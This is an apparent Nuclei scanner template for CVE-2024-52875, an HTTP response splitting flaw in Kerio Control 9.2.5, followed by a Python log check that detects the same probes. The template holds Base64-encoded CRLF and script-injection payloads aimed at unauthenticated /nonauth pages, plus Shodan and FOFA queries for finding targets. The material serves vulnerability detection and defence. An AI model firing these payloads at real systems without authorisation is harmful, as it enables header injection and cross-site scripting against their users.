Vulnerability Description
Kerio Control, formerly known as Kerio WinRoute Firewall, is vulnerable to multiple HTTP Response Splitting vulnerabilities affecting versions 9.2.5.
id: CVE-2024-52875
info:
  name: Kerio Control v9.2.5 - CRLF Injection
  author: ritikchaddha,iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Kerio Control, formerly known as Kerio WinRoute Firewall, has been found vulnerable to multiple HTTP Response Splitting vulnerabilities in product affecting versions 9.2.5
  reference:
    - https://karmainsecurity.com/hacking-kerio-control-via-cve-2024-52875
    - https://nvd.nist.gov/vuln/detail/CVE-2024-52875
  classification:
    cve-id: CVE-2024-52875
    cwe-id: CWE-74
    epss-score: 0.86613
    epss-percentile: 0.99382
  metadata:
    verified: true
    max-request: 4
    shodan-query: "Kerio Control"
    fofa-query: "Kerio Control"
  tags: cve,cve2024,kerio,crlf,vkev
http:
  - method: GET
    path:
      - "{{BaseURL}}/nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d"
      - "{{BaseURL}}/nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d"
      - "{{BaseURL}}/nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d"
      - "{{BaseURL}}/nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d"
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^Crlf:\s*$'
      - type: dsl
        dsl:
          - "contains(body,'<script>alert(document.domain)</script>')"
          - 'contains(content_type, "text/html")'
          - 'contains(location, "")'
          - 'status_code == 302'
        condition: and
# digest: 4a0a004730450220774b81818443c1dae05a83043dff9fe9f8d8b49eb95b1335a112cdaca41b0dc0022100b8a8f7498370ad8482841535fbfaed30880c28eb1fc0d29d34b48266c91809f2:922c64590222798bb761d5b6d8e72950
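The template above probes the three /nonauth pages with a Base64-encoded dest value that decodes to text containing CR/LF. The following is an added example, not part of the original template or of Kerio's code: a log check that flags the same pattern from the defender's side. It assumes access logs in combined log format (for instance from a proxy in front of the appliance) and that dest is standard Base64; the function names and sample lines are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Pages listed in the template above; each takes a Base64-encoded "dest" parameter.
NONAUTH_PAGES = {
    "/nonauth/guestConfirm.cs",
    "/nonauth/addCertException.cs",
    "/nonauth/expiration.cs",
}
# Request line inside a combined-log-format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def dest_has_crlf(request_target):
    """True if the target is a listed page whose dest decodes to bytes with CR or LF."""
    parts = urlsplit(request_target)
    if parts.path not in NONAUTH_PAGES:
        return False
    for value in parse_qs(parts.query).get("dest", []):
        # parse_qs turns a literal '+' into a space; restore it before decoding.
        value = value.replace(" ", "+")
        try:
            decoded = base64.b64decode(value + "=" * (-len(value) % 4))
        except (binascii.Error, ValueError):
            continue  # not decodable as Base64, nothing to inspect
        if b"\r" in decoded or b"\n" in decoded:
            return True
    return False


def scan(lines):
    """Return request targets from log lines that carry a CR/LF-bearing dest."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and dest_has_crlf(match.group(1)):
            hits.append(match.group(1))
    return hits


# Constructed sample log lines: the template's probe, a clean redirect, an unrelated path.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d HTTP/1.1" 302 0',
    '192.0.2.11 - - [01/Jan/2025:10:00:05 +0000] "GET /nonauth/expiration.cs?dest=L2luZGV4Lmh0bWw%3d HTTP/1.1" 302 0',
    '192.0.2.12 - - [01/Jan/2025:10:00:09 +0000] "GET /index.html?dest=VGVzdA0KQ1JMRjo%3d HTTP/1.1" 200 512',
]
```

Calling scan(SAMPLE_LOG) returns only the first request target; the second decodes to a plain path and the third is not one of the listed pages.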